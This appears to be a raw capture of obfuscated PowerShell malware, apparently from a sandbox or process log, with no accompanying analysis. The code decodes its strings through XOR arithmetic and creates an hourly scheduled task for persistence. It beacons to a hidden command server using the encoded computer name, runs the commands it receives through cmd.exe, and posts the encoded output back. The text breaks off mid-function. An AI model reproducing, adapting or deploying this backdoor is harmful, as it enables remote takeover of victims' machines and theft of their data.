LiYMh74($yPvXZCD3UDvC_1I7){$b64str = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));return $b64str.replace('+', '-').replace('/', '_').replace('=', '');}function LuXhxzm2KtHSmTxS($OOa9P1cGqThqWwO3, $WnI_R){$SUZgLOy = [System.Text.Encoding]::UTF8.GetBytes($WnI_R);[System.Net.HttpWebRequest] $hcAiTwqCt9PwT = [System.Net.WebRequest]::Create($OOa9P1cGqThqWwO3);$U_NUkepb71Q = 's1lb';$AXQigUrD6uwklW01 = 'cc3g';$AXQigUrD6uwklW01 = [System.Text.Encoding]::UTF8.GetBytes($AXQigUrD6uwklW01);$AXQigUrD6uwklW01[0] = 28594 -bxor 28642;$AXQigUrD6uwklW01[1] = 7544 -bxor 7479;$AXQigUrD6uwklW01[2] = 14992 -bxor 15043;$AXQigUrD6uwklW01[3] = 65336 -bxor 65388;$U_NUkepb71Q = [System.Text.Encoding]::UTF8.GetString($AXQigUrD6uwklW01);$hcAiTwqCt9PwT.Method = $U_NUkepb71Q;$frNzen = 'x0ymi50wOBCHMa0vesHUk0hjaQq9yd1VV';$S9ybl01 = '7ZX6LiBugDgzhtuC3mTvXB60vUCC2aeFY';$S9ybl01 = [System.Text.Encoding]::UTF8.GetBytes($S9ybl01);$S9ybl01[0] = 46122 -bxor 46155;$S9ybl01[1] = 23347 -bxor 23363;$S9ybl01[2] = 58757 -bxor 58869;$S9ybl01[3] = 51395 -bxor 51375;$S9ybl01[4] = 9968 -bxor 9881;$S9ybl01[5] = 37098 -bxor 37001;$S9ybl01[6] = 55070 -bxor 55167;$S9ybl01[7] = 48095 -bxor 48043;$S9ybl01[8] = 48069 -bxor 48044;$S9ybl01[9] = 29814 -bxor 29721;$S9ybl01[10] = 49656 -bxor 49558;$S9ybl01[11] = 10102 -bxor 10073;$S9ybl01[12] = 51918 -bxor 51894;$S9ybl01[13] = 451 -bxor 494;$S9ybl01[14] = 20934 -bxor 20913;$S9ybl01[15] = 52408 -bxor 52431;$S9ybl01[16] = 40458 -bxor 40573;$S9ybl01[17] = 3704 -bxor 3669;$S9ybl01[18] = 8554 -bxor 8460;$S9ybl01[19] = 42369 -bxor 42478;$S9ybl01[20] = 2424 -bxor 2314;$S9ybl01[21] = 6571 -bxor 6598;$S9ybl01[22] = 28974 -bxor 28931;$S9ybl01[23] = 37068 -bxor 37049;$S9ybl01[24] = 9358 -bxor 9468;$S9ybl01[25] = 51114 -bxor 51142;$S9ybl01[26] = 10436 -bxor 10401;$S9ybl01[27] = 27496 -bxor 27398;$S9ybl01[28] = 20560 -bxor 20531;$S9ybl01[29] = 47641 -bxor 47734;$S9ybl01[30] = 43655 -bxor 43747;$S9ybl01[31] = 40920 -bxor 40893;$S9ybl01[32] = 7073 -bxor 7109;$frNzen = [System.Text.Encoding]::UTF8.GetString($S9ybl01);$hcAiTwqCt9PwT.ContentType = $frNzen;$hcAiTwqCt9PwT.ContentLength = $SUZgLOy.Length;try{$eLj81Oe = $hcAiTwqCt9PwT.GetRequestStream();$eLj81Oe.Write($SUZgLOy, 0, $SUZgLOy.Length);$eLj81Oe.Flush();$eLj81Oe.Close();[System.Net.HttpWebResponse] $jUYS0IdI = $hcAiTwqCt9PwT.GetResponse();$kHx3AO8E = New-Object System.IO.StreamReader($jUYS0IdI.GetResponseStream());$BK7qm = $kHx3AO8E.ReadToEnd();return $BK7qm;} catch {return '';}}function HsnmKyIW4V($wj_uC5xvtcOmXJ){$arEdmGvRqoSs = '3MAHqhnlu03NTncqN8SgQh5sFjssvVNpZzTs6GSqD4Kh2t6AH';$YGF4zEt9ImmOq8V01 = 'uv0m16W4c6b0q05fjNAIs75vvYfptNUZSy2FmYzauDl06kKtb';$YGF4zEt9ImmOq8V01 = [System.Text.Encoding]::UTF8.GetBytes($YGF4zEt9ImmOq8V01);$YGF4zEt9ImmOq8V01[0] = 441 -bxor 468;$YGF4zEt9ImmOq8V01[1] = 30585 -bxor 30474;$YGF4zEt9ImmOq8V01[2] = 36323 -bxor 36235;$YGF4zEt9ImmOq8V01[3] = 37198 -bxor 37178;$YGF4zEt9ImmOq8V01[4] = 40078 -bxor 40175;$YGF4zEt9ImmOq8V01[5] = 38586 -bxor 38554;$YGF4zEt9ImmOq8V01[6] = 60840 -bxor 60864;$YGF4zEt9ImmOq8V01[7] = 46333 -bxor 46217;$YGF4zEt9ImmOq8V01[8] = 65258 -bxor 65182;$YGF4zEt9ImmOq8V01[9] = 24688 -bxor 24576;$YGF4zEt9ImmOq8V01[10] = 28202 -bxor 28176;$YGF4zEt9ImmOq8V01[11] = 21153 -bxor 21134;$YGF4zEt9ImmOq8V01[12] = 19285 -bxor 19322;$YGF4zEt9ImmOq8V01[13] = 17638 -bxor 17558;$YGF4zEt9ImmOq8V01[14] = 23888 -bxor 23845;$YGF4zEt9ImmOq8V01[15] = 64778 -bxor 64871;$YGF4zEt9ImmOq8V01[16] = 28327 -bxor 28375;$YGF4zEt9ImmOq8V01[17] = 47484 -bxor 47377;$YGF4zEt9ImmOq8V01[18] = 36253 -bxor 36338;$YGF4zEt9ImmOq8V01[19] = 24347 -bxor 24431;$YGF4zEt9ImmOq8V01[20] = 18501 -bxor 18474;$YGF4zEt9ImmOq8V01[21] = 36431 -bxor 36413;$YGF4zEt9ImmOq8V01[22] = 58881 -bxor 58927;$YGF4zEt9ImmOq8V01[23] = 48386 -bxor 48492;$YGF4zEt9ImmOq8V01[24] = 30443 -bxor 30350;$YGF4zEt9ImmOq8V01[25] = 4839 -bxor 4755;$YGF4zEt9ImmOq8V01[26] = 49836 -bxor 49795;$YGF4zEt9ImmOq8V01[27] = 58161 -bxor 58196;$YGF4zEt9ImmOq8V01[28] = 11345 -bxor 11317;$YGF4zEt9ImmOq8V01[29] = 15971 -bxor 15882;$YGF4zEt9ImmOq8V01[30] = 14289 -bxor 14245;$YGF4zEt9ImmOq8V01[31] = 16163 -bxor 16204;$YGF4zEt9ImmOq8V01[32] = 41830 -bxor 41748;$YGF4zEt9ImmOq8V01[33] = 60433 -bxor 60478;$YGF4zEt9ImmOq8V01[34] = 49169 -bxor 49250;$YGF4zEt9ImmOq8V01[35] = 43694 -bxor 43715;$YGF4zEt9ImmOq8V01[36] = 38532 -bxor 38629;$YGF4zEt9ImmOq8V01[37] = 54818 -bxor 54864;$YGF4zEt9ImmOq8V01[38] = 10972 -bxor 10920;$YGF4zEt9ImmOq8V01[39] = 12822 -bxor 12921;$YGF4zEt9ImmOq8V01[40] = 32341 -bxor 32293;$YGF4zEt9ImmOq8V01[41] = 22378 -bxor 22302;$YGF4zEt9ImmOq8V01[42] = 29039 -bxor 28934;$YGF4zEt9ImmOq8V01[43] = 41069 -bxor 40962;$YGF4zEt9ImmOq8V01[44] = 31435 -bxor 31397;$YGF4zEt9ImmOq8V01[45] = 5356 -bxor 5314;$YGF4zEt9ImmOq8V01[46] = 53862 -bxor 53782;$YGF4zEt9ImmOq8V01[47] = 42702 -bxor 42662;$YGF4zEt9ImmOq8V01[48] = 26219 -bxor 26139;$arEdmGvRqoSs = [System.Text.Encoding]::UTF8.GetString($YGF4zEt9ImmOq8V01);$LNCKYBeJkQ = $arEdmGvRqoSs;schtasks /create /sc minute /mo 60 /tn $wj_uC5xvtcOmXJ /tr $LNCKYBeJkQ /f;}Add-Type -AssemblyName System.Web;function HpWPuNxj(){$aDqmdv69z2D = 'CcMtwBVs1FrdaHKvuAy0O7lwikCDP1blIoiPRVCAKE4JINSMu20WWTKlb';$h0Osuy3sf0um4xob01 = 'KxYDx7KGK60vfXbO9SWmMk39bDwMEsaaIDF9KmGMhFdbv83lteymEPSNS';$h0Osuy3sf0um4xob01 = [System.Text.Encoding]::UTF8.GetBytes($h0Osuy3sf0um4xob01);$h0Osuy3sf0um4xob01[0] = 40925 -bxor 40885;$h0Osuy3sf0um4xob01[1] = 25917 -bxor 25929;$h0Osuy3sf0um4xob01[2] = 10834 -bxor 10790;$h0Osuy3sf0um4xob01[3] = 25035 -bxor 25019;$h0Osuy3sf0um4xob01[4] = 55363 -bxor 55417;$h0Osuy3sf0um4xob01[5] = 63115 -bxor 63140;$h0Osuy3sf0um4xob01[6] = 44806 -bxor 44841;$h0Osuy3sf0um4xob01[7] = 61613 -bxor 61638;$h0Osuy3sf0um4xob01[8] = 1647 -bxor 1546;$h0Osuy3sf0um4xob01[9] = 8875 -bxor 8901;$h0Osuy3sf0um4xob01[10] = 32648 -bxor 32764;$h0Osuy3sf0um4xob01[11] = 20987 -bxor 20876;$h0Osuy3sf0um4xob01[12] = 21901 -bxor 21996;$h0Osuy3sf0um4xob01[13] = 50279 -bxor 50195;$h0Osuy3sf0um4xob01[14] = 9552 -bxor 9525;$h0Osuy3sf0um4xob01[15] = 9180 -bxor 9134;$h0Osuy3sf0um4xob01[16] = 32380 -bxor 32338;$h0Osuy3sf0um4xob01[17] = 9253 -bxor 9286;$h0Osuy3sf0um4xob01[18] = 51020 -bxor 50978;$h0Osuy3sf0um4xob01[19] = 40144 -bxor 40191;$h0Osuy3sf0um4xob01[20] = 14537 -bxor 14506;$h0Osuy3sf0um4xob01[21] = 43110 -bxor 43015;$h0Osuy3sf0um4xob01[22] = 12761 -bxor 12730;$h0Osuy3sf0um4xob01[23] = 23564 -bxor 23652;$h0Osuy3sf0um4xob01[24] = 42886 -bxor 42979;$h0Osuy3sf0um4xob01[25] = 28120 -bxor 28075;$h0Osuy3sf0um4xob01[26] = 945 -bxor 926;$h0Osuy3sf0um4xob01[27] = 63474 -bxor 63377;$h0Osuy3sf0um4xob01[28] = 8366 -bxor 8399;$h0Osuy3sf0um4xob01[29] = 63486 -bxor 63389;$h0Osuy3sf0um4xob01[30] = 58761 -bxor 58849;$h0Osuy3sf0um4xob01[31] = 30054 -bxor 29955;$h0Osuy3sf0um4xob01[32] = 9022 -bxor 9037;$h0Osuy3sf0um4xob01[33] = 3921 -bxor 3854;$h0Osuy3sf0um4xob01[34] = 7213 -bxor 7257;$h0Osuy3sf0um4xob01[35] = 34342 -bxor 34371;$h0Osuy3sf0um4xob01[36] = 44059 -bxor 44150;$h0Osuy3sf0um4xob01[37] = 12710 -bxor 12758;$h0Osuy3sf0um4xob01[38] = 3611 -bxor 3703;$h0Osuy3sf0um4xob01[39] = 38279 -bxor 38374;$h0Osuy3sf0um4xob01[40] = 10949 -bxor 10929;$h0Osuy3sf0um4xob01[41] = 62189 -bxor 62088;$h0Osuy3sf0um4xob01[42] = 65064 -bxor 65031;$h0Osuy3sf0um4xob01[43] = 19120 -bxor 19141;$h0Osuy3sf0um4xob01[44] = 19944 -bxor 19867;$h0Osuy3sf0um4xob01[45] = 39289 -bxor 39196;$h0Osuy3sf0um4xob01[46] = 62317 -bxor 62239;$h0Osuy3sf0um4xob01[47] = 46715 -bxor 46676;$h0Osuy3sf0um4xob01[48] = 31947 -bxor 31906;$h0Osuy3sf0um4xob01[49] = 41223 -bxor 41321;$h0Osuy3sf0um4xob01[50] = 32964 -bxor 32928;$h0Osuy3sf0um4xob01[51] = 13877 -bxor 13904;$h0Osuy3sf0um4xob01[52] = 26292 -bxor 26316;$h0Osuy3sf0um4xob01[53] = 17762 -bxor 17740;$h0Osuy3sf0um4xob01[54] = 53838 -bxor 53822;$h0Osuy3sf0um4xob01[55] = 39672 -bxor 39568;$h0Osuy3sf0um4xob01[56] = 16701 -bxor 16717;$aDqmdv69z2D = [System.Text.Encoding]::UTF8.GetString($h0Osuy3sf0um4xob01);$nh8ZPuNg4pK3aOp = $aDqmdv69z2D;$SG6M0ouk2cQUfpHV = LiYMh74($env:COMPUTERNAME);if ($SG6M0ouk2cQUfpHV -eq ''){$rbbqyvzmbQxW5vj = 'm4JO4dFbEn3j';$jDyM0BkFGCVhyt01 = 'R5m7du2ge0PV';$jDyM0BkFGCVhyt01 = [System.Text.Encoding]::UTF8.GetBytes($jDyM0BkFGCVhyt01);$jDyM0BkFGCVhyt01[0] = 42523 -bxor 42602;$jDyM0BkFGCVhyt01[1] = 14543 -bxor 14519;$jDyM0BkFGCVhyt01[2] = 50284 -bxor 50261;$jDyM0BkFGCVhyt01[3] = 48121 -bxor 48074;$jDyM0BkFGCVhyt01[4] = 25864 -bxor 25946;$jDyM0BkFGCVhyt01[5] = 64399 -bxor 64492;$jDyM0BkFGCVhyt01[6] = 41398 -bxor 41410;$jDyM0BkFGCVhyt01[7] = 63962 -bxor 63976;$jDyM0BkFGCVhyt01[8] = 40459 -bxor 40524;$jDyM0BkFGCVhyt01[9] = 39021 -bxor 38964;$jDyM0BkFGCVhyt01[10] = 29569 -bxor 29616;$jDyM0BkFGCVhyt01[11] = 12724 -bxor 12762;$rbbqyvzmbQxW5vj = [System.Text.Encoding]::UTF8.GetString($jDyM0BkFGCVhyt01);$SG6M0ouk2cQUfpHV = $rbbqyvzmbQxW5vj;}$cL4OLMozllhTOvN0 = 'mc3xH8dj1pOYCYTMFUU';$i_yupXum9o4A01 = 'n97O4RL1O9meVciqKn9';$i_yupXum9o4A01 = [System.Text.Encoding]::UTF8.GetBytes($i_yupXum9o4A01);$i_yupXum9o4A01[0] = 25703 -bxor 25661;$i_yupXum9o4A01[1] = 24729 -bxor 24745;$i_yupXum9o4A01[2] = 43535 -bxor 43579;$i_yupXum9o4A01[3] = 39771 -bxor 39697;$i_yupXum9o4A01[4] = 2522 -bxor 2493;$i_yupXum9o4A01[5] = 10517 -bxor 10604;$i_yupXum9o4A01[6] = 20530 -bxor 20490;$i_yupXum9o4A01[7] = 19045 -bxor 18997;$i_yupXum9o4A01[8] = 39629 -bxor 39594;$i_yupXum9o4A01[9] = 10440 -bxor 10392;$i_yupXum9o4A01[10] = 6161 -bxor 6183;$i_yupXum9o4A01[11] = 24150 -bxor 24069;$i_yupXum9o4A01[12] = 9906 -bxor 9856;$i_yupXum9o4A01[13] = 18939 -bxor 18850;$i_yupXum9o4A01[14] = 2491 -bxor 2521;$i_yupXum9o4A01[15] = 41121 -bxor 41103;$i_yupXum9o4A01[16] = 15101 -bxor 15001;$i_yupXum9o4A01[17] = 61464 -bxor 61561;$i_yupXum9o4A01[18] = 53213 -bxor 53161;$cL4OLMozllhTOvN0 = [System.Text.Encoding]::UTF8.GetString($i_yupXum9o4A01);$em9ZbV = $cL4OLMozllhTOvN0;$jW3dX = $env:APPDATA + '\' + $em9ZbV;$H6Rq5fB4aky27 = 'pVhWrpfLw1HlIv2e0mKk';$hdeNFbCBu6QgOZV001 = 'maHtOIXxL4H1dpTrLhaD';$hdeNFbCBu6QgOZV001 = [System.Text.Encoding]::UTF8.GetBytes($hdeNFbCBu6QgOZV001);$hdeNFbCBu6QgOZV001[0] = 14735 -bxor 14784;$hdeNFbCBu6QgOZV001[1] = 50810 -bxor 50716;$hdeNFbCBu6QgOZV001[2] = 56841 -bxor 56943;$hdeNFbCBu6QgOZV001[3] = 2786 -bxor 2699;$hdeNFbCBu6QgOZV001[4] = 36501 -bxor 36598;$hdeNFbCBu6QgOZV001[5] = 14180 -bxor 14081;$hdeNFbCBu6QgOZV001[6] = 64650 -bxor 64726;$hdeNFbCBu6QgOZV001[7] = 26751 -bxor 26640;$hdeNFbCBu6QgOZV001[8] = 64146 -bxor 64226;$hdeNFbCBu6QgOZV001[9] = 20928 -bxor 20916;$hdeNFbCBu6QgOZV001[10] = 53051 -bxor 53074;$hdeNFbCBu6QgOZV001[11] = 47608 -bxor 47511;$hdeNFbCBu6QgOZV001[12] = 22734 -bxor 22688;$hdeNFbCBu6QgOZV001[13] = 44933 -bxor 45017;$hdeNFbCBu6QgOZV001[14] = 16707 -bxor 16694;$hdeNFbCBu6QgOZV001[15] = 16066 -bxor 16050;$hdeNFbCBu6QgOZV001[16] = 19562 -bxor 19470;$hdeNFbCBu6QgOZV001[17] = 14290 -bxor 14259;$hdeNFbCBu6QgOZV001[18] = 64053 -bxor 64065;$hdeNFbCBu6QgOZV001[19] = 52106 -bxor 52207;$H6Rq5fB4aky27 = [System.Text.Encoding]::UTF8.GetString($hdeNFbCBu6QgOZV001); $fv0na8jKt8 = $H6Rq5fB4aky27;HsnmKyIW4V($fv0na8jKt8);while ($true){$kwMplBvRq2zt = '';$b2ZuuGw = 'Auc562ufGzyBeD';$U1jgVr9t01 = 'Up7wMMVScRE5Fh';$U1jgVr9t01 = [System.Text.Encoding]::UTF8.GetBytes($U1jgVr9t01);$U1jgVr9t01[0] = 62752 -bxor 62807;$U1jgVr9t01[1] = 47460 -bxor 47405;$U1jgVr9t01[2] = 26476 -bxor 26458;$U1jgVr9t01[3] = 20905 -bxor 20952;$U1jgVr9t01[4] = 12842 -bxor 12870;$U1jgVr9t01[5] = 42712 -bxor 42729;$U1jgVr9t01[6] = 31801 -bxor 31754;$U1jgVr9t01[7] = 37246 -bxor 37199;$U1jgVr9t01[8] = 35733 -bxor 35780;$U1jgVr9t01[9] = 47302 -bxor 47348;$U1jgVr9t01[10] = 23154 -bxor 23100;$U1jgVr9t01[11] = 37942 -bxor 37980;$U1jgVr9t01[12] = 32836 -bxor 32808;$U1jgVr9t01[13] = 35471 -bxor 35578;$b2ZuuGw = [System.Text.Encoding]::UTF8.GetString($U1jgVr9t01);$iuwAqApqcmXkAO = $b2ZuuGw;$pkSm2KoWGmydHl = 'gx68xiwFQubpVyqw53cUF9VUTzYtTJdJQh';$J6czkLmSPP01 = 'Amm0QsmzrP9n7LV4yXGOsTLSlTsBftEjW3';$J6czkLmSPP01 = [System.Text.Encoding]::UTF8.GetBytes($J6czkLmSPP01);$J6czkLmSPP01[0] = 15494 -bxor 15602;$J6czkLmSPP01[1] = 51078 -bxor 51199;$J6czkLmSPP01[2] = 60739 -bxor 60723;$J6czkLmSPP01[3] = 22199 -bxor 22226;$J6czkLmSPP01[4] = 62504 -bxor 62485;$J6czkLmSPP01[5] = 11129 -bxor 11034;$J6czkLmSPP01[6] = 5008 -bxor 5119;$J6czkLmSPP01[7] = 41878 -bxor 41979;$J6czkLmSPP01[8] = 8100 -bxor 8137;$J6czkLmSPP01[9] = 39566 -bxor 39663;$J6czkLmSPP01[10] = 7666 -bxor 7580;$J6czkLmSPP01[11] = 53922 -bxor 53958;$J6czkLmSPP01[12] = 48490 -bxor 48460;$J6czkLmSPP01[13] = 32205 -bxor 32169;$J6czkLmSPP01[14] = 45935 -bxor 45830;$J6czkLmSPP01[15] = 65532 -bxor 65422;$J6czkLmSPP01[16] = 52874 -bxor 52975;$J6czkLmSPP01[17] = 44326 -bxor 44357;$J6czkLmSPP01[18] = 14151 -bxor 14131;$J6czkLmSPP01[19] = 46007 -bxor 46046;$J6czkLmSPP01[20] = 58204 -bxor 58163;$J6czkLmSPP01[21] = 15091 -bxor 15005;$J6czkLmSPP01[22] = 36865 -bxor 36924;$J6czkLmSPP01[23] = 13189 -bxor 13303;$J6czkLmSPP01[24] = 24261 -bxor 24224;$J6czkLmSPP01[25] = 617 -bxor 522;$J6czkLmSPP01[26] = 1398 -bxor 1299;$J6czkLmSPP01[27] = 19254 -bxor 19295;$J6czkLmSPP01[28] = 47697 -bxor 47655;$J6czkLmSPP01[29] = 52994 -bxor 53095;$J6czkLmSPP01[30] = 14975 -bxor 14937;$J6czkLmSPP01[31] = 24397 -bxor 24356;$J6czkLmSPP01[32] = 28344 -bxor 28380;$J6czkLmSPP01[33] = 43809 -bxor 43804;$pkSm2KoWGmydHl = [System.Text.Encoding]::UTF8.GetString($J6czkLmSPP01);$HCp0q = S54m3xeK($pkSm2KoWGmydHl + $SG6M0ouk2cQUfpHV);$finalUrl = $nh8ZPuNg4pK3aOp + $HCp0q;$qr27kycI = [System.Net.WebRequest]::Create($nh8ZPuNg4pK3aOp + $HCp0q);try{$F09ffIubQJm = $qr27kycI.GetResponse();} catch {$OURFvRexTaeE23zV = Get-Random -Maximum 60;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;continue;}$AGDFmtT = $F09ffIubQJm.StatusCode;$CGDqIISmGvhx84xp = 'aB1L';$Z3PnDkPyrJM73T01 = 'IOk1';$Z3PnDkPyrJM73T01 = [System.Text.Encoding]::UTF8.GetBytes($Z3PnDkPyrJM73T01);$Z3PnDkPyrJM73T01[0] = 9069 -bxor 8983;$Z3PnDkPyrJM73T01[1] = 26507 -bxor 26611;$Z3PnDkPyrJM73T01[2] = 28065 -bxor 28099;$Z3PnDkPyrJM73T01[3] = 19950 -bxor 19860;$CGDqIISmGvhx84xp = [System.Text.Encoding]::UTF8.GetString($Z3PnDkPyrJM73T01);$R4db3ayUHUw6A = $CGDqIISmGvhx84xp;$sr1olbnmchzR = '3HjQh';$BmOthTTBpzx601 = 'DSc4W';$BmOthTTBpzx601 = [System.Text.Encoding]::UTF8.GetBytes($BmOthTTBpzx601);$BmOthTTBpzx601[0] = 11248 -bxor 11139;$BmOthTTBpzx601[1] = 26060 -bxor 26040;$BmOthTTBpzx601[2] = 5138 -bxor 5235;$BmOthTTBpzx601[3] = 50639 -bxor 50621;$BmOthTTBpzx601[4] = 40904 -bxor 40892;$sr1olbnmchzR = [System.Text.Encoding]::UTF8.GetString($BmOthTTBpzx601);$gha9dupC = $sr1olbnmchzR;$ud3JSBmy = '7WSFDu';$laADOozsqXRnUEKX01 = 'zdl0r0';$laADOozsqXRnUEKX01 = [System.Text.Encoding]::UTF8.GetBytes($laADOozsqXRnUEKX01);$laADOozsqXRnUEKX01[0] = 1291 -bxor 1378;$laADOozsqXRnUEKX01[1] = 18218 -bxor 18253;$laADOozsqXRnUEKX01[2] = 33393 -bxor 33311;$laADOozsqXRnUEKX01[3] = 25622 -bxor 25721;$laADOozsqXRnUEKX01[4] = 1288 -bxor 1402;$laADOozsqXRnUEKX01[5] = 4445 -bxor 4408;$ud3JSBmy = [System.Text.Encoding]::UTF8.GetString($laADOozsqXRnUEKX01);$GdD5nwImmlfb = $ud3JSBmy;If ($AGDFmtT -eq 200){$x1XuBfdP = New-Object System.IO.StreamReader $F09ffIubQJm.GetResponseStream();$xYlVKzM=$x1XuBfdP.ReadToEnd();if (!$xYlVKzM.Contains('Fail')){if ($xYlVKzM.Contains($R4db3ayUHUw6A)){$INTZ_4FIYL = $xYlVKzM.Substring(16);$aSzFooViwhHMOS = 'Qe6gShw2HEk48NuJdH08FFLNZ9SDUu';$QmtbPoE501 = 'iXit2bA102BXNLHDtLO9qEgZ18C8ml';$QmtbPoE501 = [System.Text.Encoding]::UTF8.GetBytes($QmtbPoE501);$QmtbPoE501[0] = 42900 -bxor 42976;$QmtbPoE501[1] = 1496 -bxor 1441;$QmtbPoE501[2] = 63438 -bxor 63422;$QmtbPoE501[3] = 45050 -bxor 44959;$QmtbPoE501[4] = 56917 -bxor 56936;$QmtbPoE501[5] = 522 -bxor 632;$QmtbPoE501[6] = 4611 -bxor 4710;$QmtbPoE501[7] = 16552 -bxor 16603;$QmtbPoE501[8] = 18031 -bxor 17946;$QmtbPoE501[9] = 24549 -bxor 24457;$QmtbPoE501[10] = 65415 -bxor 65523;$QmtbPoE501[11] = 53065 -bxor 53103;$QmtbPoE501[12] = 56 -bxor 92;$QmtbPoE501[13] = 3692 -bxor 3589;$QmtbPoE501[14] = 16896 -bxor 17010;$QmtbPoE501[15] = 32257 -bxor 32356;$QmtbPoE501[16] = 34225 -bxor 34258;$QmtbPoE501[17] = 23229 -bxor 23241;$QmtbPoE501[18] = 58075 -bxor 58034;$QmtbPoE501[19] = 874 -bxor 773;$QmtbPoE501[20] = 18856 -bxor 18886;$QmtbPoE501[21] = 14808 -bxor 14821;$QmtbPoE501[22] = 13100 -bxor 13151;$QmtbPoE501[23] = 32024 -bxor 32125;$QmtbPoE501[24] = 48573 -bxor 48595;$QmtbPoE501[25] = 29557 -bxor 29457;$QmtbPoE501[26] = 35754 -bxor 35724;$QmtbPoE501[27] = 18256 -bxor 18233;$QmtbPoE501[28] = 10302 -bxor 10330;$QmtbPoE501[29] = 31470 -bxor 31443;$aSzFooViwhHMOS = [System.Text.Encoding]::UTF8.GetString($QmtbPoE501);$Ucwy0 = $aSzFooViwhHMOS;$aerNl = 'KfG0B';$avSeb2v01 = '21Oa4';$avSeb2v01 = [System.Text.Encoding]::UTF8.GetBytes($avSeb2v01);$avSeb2v01[0] = 26583 -bxor 26547;$avSeb2v01[1] = 13113 -bxor 13144;$avSeb2v01[2] = 56692 -bxor 56576;$avSeb2v01[3] = 45665 -bxor 45568;$avSeb2v01[4] = 50960 -bxor 50989;$aerNl = [System.Text.Encoding]::UTF8.GetString($avSeb2v01);$RrQmsQ = $aerNl;$HCp0q = S54m3xeK($Ucwy0 + $SG6M0ouk2cQUfpHV);$kwMplBvRq2zt = $nh8ZPuNg4pK3aOp + $HCp0q;if ($INTZ_4FIYL.Contains($gha9dupC)){cmd.exe /c $INTZ_4FIYL;$Zcg1A0Ue7OSiFQKP = 'M0';$TwnAoLGHUy01 = 'Ja';$TwnAoLGHUy01 = [System.Text.Encoding]::UTF8.GetBytes($TwnAoLGHUy01);$TwnAoLGHUy01[0] = 49887 -bxor 49808;$TwnAoLGHUy01[1] = 17974 -bxor 18045;$Zcg1A0Ue7OSiFQKP = [System.Text.Encoding]::UTF8.GetString($TwnAoLGHUy01);$BK7qm = $Zcg1A0Ue7OSiFQKP;} elseif($INTZ_4FIYL.Contains($GdD5nwImmlfb)){$INTZ_4FIYL = $INTZ_4FIYL.Substring(7);cmd.exe /c $INTZ_4FIYL;$wq95SC = 'alz2ozVEx';$SSe4s9RT4FU301 = '7VbvRmaFz';$SSe4s9RT4FU301 = [System.Text.Encoding]::UTF8.GetBytes($SSe4s9RT4FU301);$SSe4s9RT4FU301[0] = 29420 -bxor 29347;$SSe4s9RT4FU301[1] = 5355 -bxor 5280;$SSe4s9RT4FU301[2] = 2532 -bxor 2491;$SSe4s9RT4FU301[3] = 10724 -bxor 10669;$SSe4s9RT4FU301[4] = 42947 -bxor 42916;$SSe4s9RT4FU301[5] = 33012 -bxor 32922;$SSe4s9RT4FU301[6] = 37054 -bxor 37073;$SSe4s9RT4FU301[7] = 39326 -bxor 39404;$SSe4s9RT4FU301[8] = 17635 -bxor 17542;$wq95SC = [System.Text.Encoding]::UTF8.GetString($SSe4s9RT4FU301);$BK7qm = $wq95SC;} else {cmd.exe /c $INTZ_4FIYL > $jW3dX;$BK7qm = [System.IO.File]::ReadAllText($jW3dX);}$ltymfR5pSPm405Rv = $xYlVKzM + [Environment]::NewLine + $BK7qm;$jBTtUYqXEU_a = SWWZUOAn($ltymfR5pSPm405Rv);$rg32vOo1DUImKMD = [System.Web.HttpUtility]::UrlEncode($jBTtUYqXEU_a);$iuwAqApqcmXkAO = $RrQmsQ + $rg32vOo1DUImKMD;}}}$F09ffIubQJm.Close();if ($kwMplBvRq2zt -ne ''){LuXhxzm2KtHSmTxS $kwMplBvRq2zt $iuwAqApqcmXkAO;}$OURFvRexTaeE23zV = Get-Random -Maximum 15;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;}}HpWPuNxj;
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ElksyKqgq = 'NzXwsdKH4mhsJlZ';$dS1me690PeF01 = 'yPY0RHrDa5fVEbN';$dS1me690PeF01 = [System.Text.Encoding]::UTF8.GetBytes($dS1me690PeF01);$dS1me690PeF01[0] = 33312 -bxor 33350;$dS1me690PeF01[1] = 5894 -bxor 5980;$dS1me690PeF01[2] = 53821 -bxor 53844;$dS1me690PeF01[3] = 24611 -bxor 24676;$dS1me690PeF01[4] = 2604 -bxor 2585;$dS1me690PeF01[5] = 43144 -bxor 43234;$dS1me690PeF01[6] = 41855 -bxor 41806;$dS1me690PeF01[7] = 41245 -bxor 41330;$dS1me690PeF01[8] = 43527 -bxor 43583;$dS1me690PeF01[9] = 53707 -bxor 53667;$dS1me690PeF01[10] = 61928 -bxor 61853;$dS1me690PeF01[11] = 4996 -bxor 5066;$dS1me690PeF01[12] = 27428 -bxor 27470;$dS1me690PeF01[13] = 54354 -bxor 54282;$dS1me690PeF01[14] = 35537 -bxor 35463;$ElksyKqgq = [System.Text.Encoding]::UTF8.GetString($dS1me690PeF01);$qPaINTp8mf0 = $ElksyKqgq;function whKgZ($yTCpQOfKack, $xYlVKzM){$rCjLJasyf0m7 = [System.Text.Encoding]::UTF8;$CRABmSSX_ = $rCjLJasyf0m7.GetBytes($yTCpQOfKack);$LyZoc7Ykbs = $rCjLJasyf0m7.GetBytes($xYlVKzM);for ($i=0; $i -lt $LyZoc7Ykbs.length;){for ($j =0; $j -lt $CRABmSSX_.length; $j++){$LyZoc7Ykbs[$i] = $LyZoc7Ykbs[$i] -bxor $CRABmSSX_[$j];$i++;if ($i -ge $LyZoc7Ykbs.length){$j = $CRABmSSX_.length;}}}$ySwqdHx8Dh = [System.Convert]::ToBase64String($LyZoc7Ykbs);$ySwqdHx8Dh = $ySwqdHx8Dh.replace('+', '-').replace('/', '_').replace('=', '');return $ySwqdHx8Dh;}function mdkinhmi0xs63xl($Ube5aXEYlM7){return (-join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) \| Get-Random -Count $Ube5aXEYlM7 \| % {[char]$_}));}function S54m3xeK($nmLUVYfYimhN){$BMxL1 = mdkinhmi0xs63xl(5);$RznphCP = mdkinhmi0xs63xl(7);$xwhlQbRfEg_wwKF = mdkinhmi0xs63xl(16);$V4yUZ8nNguf7 = whKgZ $xwhlQbRfEg_wwKF $nmLUVYfYimhN;$BK7qm = '';$eWPzX = Get-Random -Maximum 5;for ($i = 0; $i -lt $eWPzX; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 